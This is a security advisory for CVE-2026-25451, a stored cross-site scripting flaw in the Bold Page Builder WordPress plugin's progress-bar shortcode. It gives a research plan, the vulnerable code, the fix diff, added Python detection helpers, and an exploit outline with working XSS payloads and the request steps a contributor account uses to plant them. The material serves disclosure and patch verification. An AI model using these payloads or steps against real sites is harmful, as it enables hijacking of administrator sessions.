CVE-2026-25451

Bold Page Builder <= 5.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Severity: medium
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Patched in: 5.7.0
Time to patch: 86 days

Description

The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 5.6.9
Published: January 20, 2026
Last updated: April 15, 2026
Affected plugin: bold-page-builder
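A quick way to apply the range above to an install you are auditing offline (a backup, or an extracted plugin directory) is to read the Version: field from the plugin's main-file header and compare it numerically. The Python below is an added example for this advisory, not code from the plugin or from this site; the header text is constructed, and the main file is assumed to be bold-builder.php, which this page names but does not reproduce.

```python
"""Decide whether a Bold Page Builder install is in the affected range (<= 5.6.9)
from its WordPress plugin header. Added example for this advisory; not code from
the plugin or from wp-safety.org. The header below is constructed, and the main
file name bold-builder.php is an assumption."""
import re

PATCHED_IN = '5.7.0'  # version named on this advisory

# Matches a " * Version: x.y.z" line inside the plugin header comment block.
HEADER_RE = re.compile(r'^\s*\*?\s*Version:\s*(\S+)', re.MULTILINE)


def parse_version(text):
    """'5.6.9' -> (5, 6, 9). Integer tuples, not strings: '5.6.10' < '5.6.9'
    is true for strings and wrong for versions."""
    return tuple(int(p) for p in re.findall(r'\d+', text))


def version_lt(a, b):
    """True if version a predates version b; shorter tuples are zero-padded."""
    ta, tb = parse_version(a), parse_version(b)
    width = max(len(ta), len(tb))
    ta += (0,) * (width - len(ta))
    tb += (0,) * (width - len(tb))
    return ta < tb


def header_version(plugin_source):
    """The Version: value from a plugin main file, or None if there is no header."""
    m = HEADER_RE.search(plugin_source)
    return m.group(1) if m else None


def is_affected(plugin_source):
    """True if the install predates 5.7.0, False if patched, None if unknown."""
    v = header_version(plugin_source)
    if v is None:
        return None
    return version_lt(v, PATCHED_IN)


# Constructed header in the standard WordPress plugin-header format.
SAMPLE_VULNERABLE = """<?php
/**
 * Plugin Name: Bold Page Builder
 * Version: 5.6.9
 */
"""
SAMPLE_PATCHED = SAMPLE_VULNERABLE.replace('5.6.9', '5.7.0')

if __name__ == '__main__':
    for label, src in (('5.6.9', SAMPLE_VULNERABLE), ('5.7.0', SAMPLE_PATCHED)):
        print(label, 'affected' if is_affected(src) else 'patched')
```

On a live site, wp plugin get bold-page-builder --field=version answers the same question; the point of the parser is the integer-tuple comparison, since a plain string compare puts 5.6.10 before 5.6.9.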

What Changed in the Fix

Changes introduced in v5.7.0

The 5.6.9 to 5.7.0 diff for content_elements/bt_bb_progress_bar/bt_bb_progress_bar.php is reproduced under Security Fix below.

Source Code

WordPress.org SVN
Research Plan
Unverified


Research Plan: CVE-2026-25451 Bold Page Builder Stored XSS

1. Vulnerability Summary

The Bold Page Builder plugin (versions <= 5.6.9) is vulnerable to Authenticated Stored Cross-Site Scripting (XSS). The vulnerability exists within the rendering of the bt_bb_progress_bar content element. Specifically, the text attribute of the [bt_bb_progress_bar] shortcode is output to the page without proper sanitization or escaping, allowing users with at least Contributor-level permissions to inject arbitrary JavaScript.

2. Attack Vector Analysis

  • Endpoint: WordPress Post Editor (/wp-admin/post-new.php or /wp-admin/post.php) or the Bold Builder Frontend Editor.
  • Vulnerable Attribute: The text parameter of the bt_bb_progress_bar element.
  • Authentication Level: Contributor+. Contributors can create posts and insert shortcodes, although they cannot publish them. The XSS will execute when an Editor or Admin previews or views the draft.
  • Preconditions: The Bold Page Builder plugin must be active.

3. Code Flow

  1. Entry Point: A user with Contributor permissions creates a post containing the following shortcode:
    [bt_bb_progress_bar text="<script>alert(document.domain)</script>"]
  2. Shortcode Registration: The plugin registers content elements. In content_elements/bt_bb_progress_bar/bt_bb_progress_bar.php, the class bt_bb_progress_bar extends BT_BB_Element.
  3. Shortcode Handling: When the page is rendered, WordPress invokes the element's handle_shortcode method.
  4. Attribute Extraction: The attributes are pulled out with shortcode_atts and turned into local variables by extract(); $text receives the attacker's value unchanged, since shortcode_atts only fills in defaults and does not sanitize.
  5. Vulnerable Sink: Where $output is built (the fix diff below places this in the hunk starting at line 87 of the 5.6.9 file), the string is concatenated as:
    $output .= '<div' . $id_attr . ' class="' . esc_attr( implode( ' ', $class ) ) . '"' . $style_attr . ' data-bt-override-class="' . htmlspecialchars( json_encode( $data_override_class, JSON_FORCE_OBJECT ), ENT_QUOTES, 'UTF-8' ) . '"><div class="bt_bb_progress_bar_bg"></div><div class="bt_bb_progress_bar_inner animate" style="width:' . esc_attr( intval( $percentage ) ) . '%"><span class="bt_bb_progress_bar_text">' . $text . '</span></div></div>';
    
  6. Failure to Escape: While $percentage is cast with intval and the class list passes through esc_attr, $text is concatenated straight into the <span> body with no esc_html() or wp_kses() call.
  7. Execution: The browser parses the injected markup inside the <span>, and any script or event handler in it runs in the viewer's origin.

4. Nonce Acquisition Strategy

This vulnerability can be exploited by saving a post through the standard WordPress editor (Classic or Gutenberg) or the REST API. If the Bold Builder Frontend Editor is used instead, its own nonce is required.

  1. Shortcode Identification: The bt_bb_progress_bar element is the target.
  2. Page Creation:
    wp post create --post_type=page --post_status=publish --post_title="XSS Test" --post_content="[bt_bb_progress_bar text='init']"
  3. Extraction:
    • Navigate to the newly created page.
    • The plugin localizes scripts for the editor. The plan infers from common BoldThemes patterns (the relevant bold-builder.php logic was truncated during analysis) that a bt_bb_settings or bt_bb_fe_data object carries the nonce; treat this as unverified.
    • In the browser console, check window.bt_bb_settings?.nonce, or inspect the data attributes on the bt_bb_fe_save button.

Note: For a plain Stored XSS PoC, creating the post with wp-cli or through the standard admin UI is the most reliable path and avoids the frontend nonce handling altogether.

5. Exploitation Strategy

  1. Authenticate: Log in as a Contributor user.
  2. Create Post: Open /wp-admin/post-new.php as that user (WordPress creates an auto-draft and issues the edit nonce), then POST the payload to /wp-admin/post.php to save it as a draft.
  3. Payload:
    [bt_bb_progress_bar text="<img src=x onerror=alert(window.origin)>" percentage="50"]
  4. HTTP Request:
    • Method: POST
    • URL: http://localhost:8080/wp-admin/post.php
    • Body (URL-encoded):
      • post_ID: (the auto-draft ID from /wp-admin/post-new.php; action=editpost requires it)
      • post_title: XSS Vulnerability Test
      • content: [bt_bb_progress_bar text="<img src=x onerror=alert(window.origin)>" percentage="50"]
      • action: editpost
      • post_type: post
      • _wpnonce: (the update-post_{ID} nonce from the /wp-admin/post-new.php form)
    • Alternative: POST the same content to /wp-json/wp/v2/posts with status=draft, authenticating with an X-WP-Nonce header (wp_rest nonce) on a cookie session or with an Application Password.
  5. Trigger: Open the post URL (or, as an Admin, the draft's preview URL) in a browser.

6. Test Data Setup

  1. User: Create a contributor user.
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  2. Plugin: Ensure bold-page-builder is active.
    wp plugin activate bold-page-builder

7. Expected Results

  • When the page containing the shortcode is rendered, the HTML source should contain:
    <span class="bt_bb_progress_bar_text"><img src=x onerror=alert(window.origin)></span>
  • The alert should fire, or the unescaped tags should be observable in the DOM.

8. Verification Steps

  1. Database Check: Verify what was actually stored. Contributors lack the unfiltered_html capability, so WordPress runs wp_kses_post over their content on save; confirm the payload survived in wp_posts rather than assuming the submitted string is what was saved.
    wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Vulnerability Test'"
  2. Output Check: Fetch the post's front end and look for the raw payload inside the bt_bb_progress_bar_text span, for example:
    curl -s 'http://localhost:8080/?p=[POST_ID]' | grep -F '<span class="bt_bb_progress_bar_text"><img'
    A match means the response body contains the raw <img src=x...> inside the span; an escaped form (&lt;img ...) means the output was neutralized.
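The expected results and verification steps above describe two checks: the stored shortcode carries markup in its text attribute, and the rendered span emits that markup raw. The Python below implements both as an added example for this advisory (not code from the plugin, from WordPress, or from this site). The post content and HTML fragments are constructed; the span markup follows the $output line quoted in the research plan, and the attribute grammar is a simplification of WordPress shortcode_parse_atts(), not its exact regular expression.

```python
"""Hunt stored bt_bb_progress_bar payloads in post_content and tell a 5.6.9-style
raw rendering from the 5.7.0 esc_html() rendering. Added example for this
advisory; not code from the plugin, WordPress or wp-safety.org. The sample
post content and HTML below are constructed."""
import re

# name="value" | name='value' | name=value. Values cannot contain ']', which
# matches the limitation of WordPress's own shortcode regex.
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'\]]+))')
SHORTCODE_RE = re.compile(r'\[bt_bb_progress_bar\b([^\]]*)\]')
# A progress-bar label should be plain text; a tag start, an event handler
# or a javascript: URL in it is worth a look.
SUSPICIOUS_RE = re.compile(r'<\s*[a-z]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)
SPAN_RE = re.compile(r'<span class="bt_bb_progress_bar_text">(.*?)</span>', re.DOTALL)


def parse_atts(attr_text):
    """Return {name: value} for a shortcode's attribute string."""
    atts = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(v for v in m.groups()[1:] if v is not None)
        atts[m.group(1).lower()] = value
    return atts


def find_suspicious_shortcodes(post_content):
    """List (shortcode, text) for every bt_bb_progress_bar whose text carries markup."""
    hits = []
    for m in SHORTCODE_RE.finditer(post_content):
        text = parse_atts(m.group(1)).get('text', '')
        if SUSPICIOUS_RE.search(text):
            hits.append((m.group(0), text))
    return hits


def esc_html(text):
    """Same character set as WordPress esc_html(); ignores its no-double-encode rule."""
    return (text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
                .replace('"', '&quot;').replace("'", '&#039;'))


def classify_rendering(page_html, submitted_text):
    """'vulnerable' if the span body is the submitted text verbatim (<= 5.6.9),
    'patched' if it is the esc_html() form (5.7.0), 'inconclusive' if the probe
    had nothing to escape, 'no-span' if the element did not render, and
    'altered' if the stored value no longer matches what was submitted."""
    if esc_html(submitted_text) == submitted_text:
        return 'inconclusive'
    m = SPAN_RE.search(page_html)
    if not m:
        return 'no-span'
    body = m.group(1)
    if body == esc_html(submitted_text):
        return 'patched'
    if body == submitted_text:
        return 'vulnerable'
    return 'altered'


PAYLOAD = '<img src=x onerror=alert(window.origin)>'

# Constructed post_content, as wp db query would return it.
SAMPLE_POST_CONTENT = (
    '<p>Team skills</p>\n'
    '[bt_bb_progress_bar text="PHP" percentage="80"]\n'
    "[bt_bb_progress_bar text='" + PAYLOAD + "' percentage=50]\n"
)

# Constructed rendering of the element's $output for one progress bar at 50%.
RENDER_TEMPLATE = ('<div class="bt_bb_progress_bar"><div class="bt_bb_progress_bar_bg"></div>'
                   '<div class="bt_bb_progress_bar_inner animate" style="width:50%">'
                   '<span class="bt_bb_progress_bar_text">{}</span></div></div>')
RENDERED_5_6_9 = RENDER_TEMPLATE.format(PAYLOAD)
RENDERED_5_7_0 = RENDER_TEMPLATE.format(esc_html(PAYLOAD))

if __name__ == '__main__':
    for shortcode, text in find_suspicious_shortcodes(SAMPLE_POST_CONTENT):
        print('suspicious shortcode:', shortcode)
    print('5.6.9 rendering:', classify_rendering(RENDERED_5_6_9, PAYLOAD))
    print('5.7.0 rendering:', classify_rendering(RENDERED_5_7_0, PAYLOAD))
```

Feed it real content from wp post list --post_status=any --fields=ID,post_content --format=json or from the wp db query shown above. The 'altered' result is the one to expect when wp_kses_post has rewritten a Contributor's payload on save; compare the rendering against what is actually stored, not against the string that was submitted.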

9. Alternative Approaches

  • Attribute Breakout: If the text attribute was inside an HTML attribute, we would use quotes to break out (e.g., text='"><script>...'). Since it is in a <span> body, the direct tag injection used above is sufficient.
  • Other Elements: If bt_bb_progress_bar turns out to be patched, other elements with free-text attributes are worth reviewing for the same concatenation pattern; the plan names bt_bb_headline and bt_bb_button as candidates, but nothing on this page confirms them.
  • Frontend Editor Bypass: If wp-admin is restricted, use the frontend builder and capture its bt_bb_fe_save AJAX request, which the plan expects to send the whole post content in a content parameter to admin-ajax.php.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'text' attribute of the 'bt_bb_progress_bar' shortcode. Authenticated attackers with contributor-level permissions or higher can inject malicious JavaScript that executes in the context of any user viewing or previewing the affected page.

Vulnerable Code

// content_elements/bt_bb_progress_bar/bt_bb_progress_bar.php

	function handle_shortcode( $atts, $content ) {
		
		extract( shortcode_atts( apply_filters( 'bt_bb_extract_atts_' . $this->shortcode, array(
			'text'        		=> '',
			'percentage'        => '',
			'color_scheme' 		=> '',
			'size'        		=> '',
			'align'        		=> '',
			'style'        		=> '',
			'shape'        		=> ''
		) ), $atts, $this->shortcode ) );	

    // ... (id, class, style and data-attribute handling elided)

		$output = '';

		$output .= '<div' . $id_attr . ' class="' . esc_attr( implode( ' ', $class ) ) . '"' . $style_attr . ' data-bt-override-class="' . htmlspecialchars( json_encode( $data_override_class, JSON_FORCE_OBJECT ), ENT_QUOTES, 'UTF-8' ) . '"><div class="bt_bb_progress_bar_bg"></div><div class="bt_bb_progress_bar_inner animate" style="width:' . esc_attr( intval( $percentage ) ) . '%"><span class="bt_bb_progress_bar_text">' . $text . '</span></div></div>';
		
		$output = apply_filters( 'bt_bb_general_output', $output, $atts );

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/bold-page-builder/5.6.9/content_elements/bt_bb_progress_bar/bt_bb_progress_bar.php	2026-03-10 17:55:28.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/bold-page-builder/5.7.0/content_elements/bt_bb_progress_bar/bt_bb_progress_bar.php	2026-03-19 11:51:30.000000000 +0000
@@ -87,7 +87,7 @@
 
 		$output = '';
 
-		$output .= '<div' . $id_attr . ' class="' . esc_attr( implode( ' ', $class ) ) . '"' . $style_attr . ' data-bt-override-class="' . htmlspecialchars( json_encode( $data_override_class, JSON_FORCE_OBJECT ), ENT_QUOTES, 'UTF-8' ) . '"><div class="bt_bb_progress_bar_bg"></div><div class="bt_bb_progress_bar_inner animate" style="width:' . esc_attr( intval( $percentage ) ) . '%"><span class="bt_bb_progress_bar_text">' . $text . '</span></div></div>';
+		$output .= '<div' . $id_attr . ' class="' . esc_attr( implode( ' ', $class ) ) . '"' . $style_attr . ' data-bt-override-class="' . htmlspecialchars( json_encode( $data_override_class, JSON_FORCE_OBJECT ), ENT_QUOTES, 'UTF-8' ) . '"><div class="bt_bb_progress_bar_bg"></div><div class="bt_bb_progress_bar_inner animate" style="width:' . esc_attr( intval( $percentage ) ) . '%"><span class="bt_bb_progress_bar_text">' . esc_html( $text ) . '</span></div></div>';
 		
 		$output = apply_filters( 'bt_bb_general_output', $output, $atts );
 		$output = apply_filters( $this->shortcode . '_output', $output, $atts );
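Review bot: esc_html( $text ) closes the span-body sink, but the same concatenation still drops $id_attr and $style_attr into the opening tag raw; whether those are escaped where they are assembled is outside this hunk and should be checked before the line is called clean. Second, esc_html() also flattens any legitimate inline markup a site may have been using in the label; if formatted labels were an intended feature, wp_kses( $text, array( 'strong' => array(), 'em' => array() ) ) would keep that while still removing scripts and event handlers. As written the change is the safer default, and the commit should say which behaviour was intended.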

Exploit Outline

  1. Authenticate as a user with at least Contributor-level permissions (e.g., Contributor, Editor).
  2. Use the standard WordPress Post Editor or the Bold Builder Frontend Editor to create a new post or page.
  3. Insert the bt_bb_progress_bar shortcode with a malicious payload in the text parameter, such as:
    [bt_bb_progress_bar text="<img src=x onerror=alert(document.domain)>"]
  4. Save the post as a draft or publish it (if permissions allow).
  5. As an administrator or any other user, navigate to the post's public URL or preview the draft. The browser renders the unescaped <span> content and executes the injected script.
